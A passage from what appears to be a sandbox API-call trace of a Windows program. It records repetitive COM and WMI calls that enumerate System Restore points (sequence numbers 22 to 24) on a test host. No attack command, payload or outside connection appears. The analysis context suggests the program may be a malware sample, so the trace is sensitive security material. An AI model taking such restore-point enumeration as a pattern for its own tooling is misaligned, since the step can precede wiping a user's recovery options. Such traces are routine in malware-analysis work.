[3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.733] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.733] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c4d8) returned 0x0 [0116.733] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c4d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.733] WbemDefPath:IUnknown:Release (This=0x77c4d8) returned 0x3 [0116.733] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.733] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.733] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.733] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x2 [0116.733] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x1 [0116.733] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.733] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.733] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x67383f0) returned 0x0 [0116.733] WbemDefPath:IUnknown:AddRef (This=0x67383f0) returned 0x3 [0116.733] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x2 [0116.733] WbemDefPath:IWbemPath:SetText (This=0x67383f0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=22") returned 0x0 [0116.733] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.733] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.733] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.733] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.733] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.733] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.733] IWbemClassObject:Get (in: This=0x673bc60, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3531130*=0, plFlavor=0x3531134*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x16, varVal2=0x0), pType=0x3531130*=19, plFlavor=0x3531134*=0) returned 0x0 [0116.734] IWbemClassObject:Get (in: This=0x673bc60, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3531130*=19, plFlavor=0x3531134*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x16, varVal2=0x0), pType=0x3531130*=19, plFlavor=0x3531134*=0) returned 0x0 [0116.734] CoTaskMemAlloc (cb=0x4) returned 0x77c518 [0116.734] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c518, puReturned=0x3526b58 | out: apObjects=0x77c518*=0x673bdf8, puReturned=0x3526b58*=0x1) returned 0x0 [0116.734] IUnknown:QueryInterface (in: This=0x673bdf8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x673bdf8) returned 0x0 [0116.734] IUnknown:QueryInterface (in: This=0x673bdf8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.734] IUnknown:QueryInterface (in: This=0x673bdf8, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.734] IUnknown:AddRef (This=0x673bdf8) returned 0x3 [0116.734] IUnknown:QueryInterface (in: This=0x673bdf8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.734] IUnknown:QueryInterface (in: This=0x673bdf8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.734] IUnknown:QueryInterface (in: This=0x673bdf8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673bdfc) returned 0x0 [0116.735] IMarshal:GetUnmarshalClass (in: This=0x673bdfc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.735] IUnknown:Release (This=0x673bdfc) returned 0x3 [0116.735] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.735] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.735] IUnknown:QueryInterface (in: This=0x673bdf8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.735] IUnknown:Release (This=0x673bdf8) returned 0x2 [0116.735] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.735] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.735] IUnknown:QueryInterface (in: This=0x673bdf8, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x673bdf8) returned 0x0 [0116.735] IUnknown:AddRef (This=0x673bdf8) returned 0x4 [0116.735] IUnknown:Release (This=0x673bdf8) returned 0x3 [0116.735] IUnknown:Release (This=0x673bdf8) returned 0x2 [0116.735] CoTaskMemFree (pv=0x77c518) [0116.735] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.735] IUnknown:AddRef (This=0x673bdf8) returned 0x3 [0116.735] IWbemClassObject:Get (in: This=0x673bdf8, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.735] IWbemClassObject:Get (in: This=0x673bdf8, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=23", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.735] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=23") returned 0x70 [0116.735] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=23") returned 0x70 [0116.736] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.736] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.736] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.736] IUnknown:Release (This=0x72015c) returned 0x1 [0116.736] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736eb8) returned 0x0 [0116.736] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736eb8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.737] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736eb8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6738460) returned 0x0 [0116.737] WbemDefPath:IUnknown:Release (This=0x6736eb8) returned 0x0 [0116.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6738460) returned 0x0 [0116.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.737] WbemDefPath:IUnknown:AddRef (This=0x6738460) returned 0x3 [0116.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c518) returned 0x0 [0116.737] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c518, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.737] WbemDefPath:IUnknown:Release (This=0x77c518) returned 0x3 [0116.737] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.737] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.737] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x2 [0116.737] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x1 [0116.737] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.737] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738460, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6738460) returned 0x0 [0116.737] WbemDefPath:IUnknown:AddRef (This=0x6738460) returned 0x3 [0116.737] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x2 [0116.737] WbemDefPath:IWbemPath:SetText (This=0x6738460, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=23") returned 0x0 [0116.737] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.737] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.738] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.738] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.738] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.738] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.738] IWbemClassObject:Get (in: This=0x673bdf8, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3531980*=0, plFlavor=0x3531984*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17, varVal2=0x0), pType=0x3531980*=19, plFlavor=0x3531984*=0) returned 0x0 [0116.738] IWbemClassObject:Get (in: This=0x673bdf8, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3531980*=19, plFlavor=0x3531984*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x17, varVal2=0x0), pType=0x3531980*=19, plFlavor=0x3531984*=0) returned 0x0 [0116.738] CoTaskMemAlloc (cb=0x4) returned 0x77c558 [0116.738] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c558, puReturned=0x3526b58 | out: apObjects=0x77c558*=0x673bf90, puReturned=0x3526b58*=0x1) returned 0x0 [0116.738] IUnknown:QueryInterface (in: This=0x673bf90, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x673bf90) returned 0x0 [0116.738] IUnknown:QueryInterface (in: This=0x673bf90, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.738] IUnknown:QueryInterface (in: This=0x673bf90, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.739] IUnknown:AddRef (This=0x673bf90) returned 0x3 [0116.739] IUnknown:QueryInterface (in: This=0x673bf90, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.739] IUnknown:QueryInterface (in: This=0x673bf90, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.739] IUnknown:QueryInterface (in: This=0x673bf90, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673bf94) returned 0x0 [0116.739] IMarshal:GetUnmarshalClass (in: This=0x673bf94, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.739] IUnknown:Release (This=0x673bf94) returned 0x3 [0116.739] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.739] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.739] IUnknown:QueryInterface (in: This=0x673bf90, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.739] IUnknown:Release (This=0x673bf90) returned 0x2 [0116.739] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.739] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.739] IUnknown:QueryInterface (in: This=0x673bf90, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x673bf90) returned 0x0 [0116.739] IUnknown:AddRef (This=0x673bf90) returned 0x4 [0116.739] IUnknown:Release (This=0x673bf90) returned 0x3 [0116.739] IUnknown:Release (This=0x673bf90) returned 0x2 [0116.740] CoTaskMemFree (pv=0x77c558) [0116.740] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.740] IUnknown:AddRef (This=0x673bf90) returned 0x3 [0116.740] IWbemClassObject:Get (in: This=0x673bf90, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.740] IWbemClassObject:Get (in: This=0x673bf90, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=24", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.740] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=24") returned 0x70 [0116.740] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=24") returned 0x70 [0116.740] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.740] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.740] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.740] IUnknown:Release (This=0x72015c) returned 0x1 [0116.741] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736ec8) returned 0x0 [0116.741] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ec8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.741] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ec8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x67384d0) returned 0x0 [0116.741] WbemDefPath:IUnknown:Release (This=0x6736ec8) returned 0x0 [0116.741] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x67384d0) returned 0x0 [0116.741] WbemDefPath:IUnknown:QueryInterface (in: This=0x67384d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, 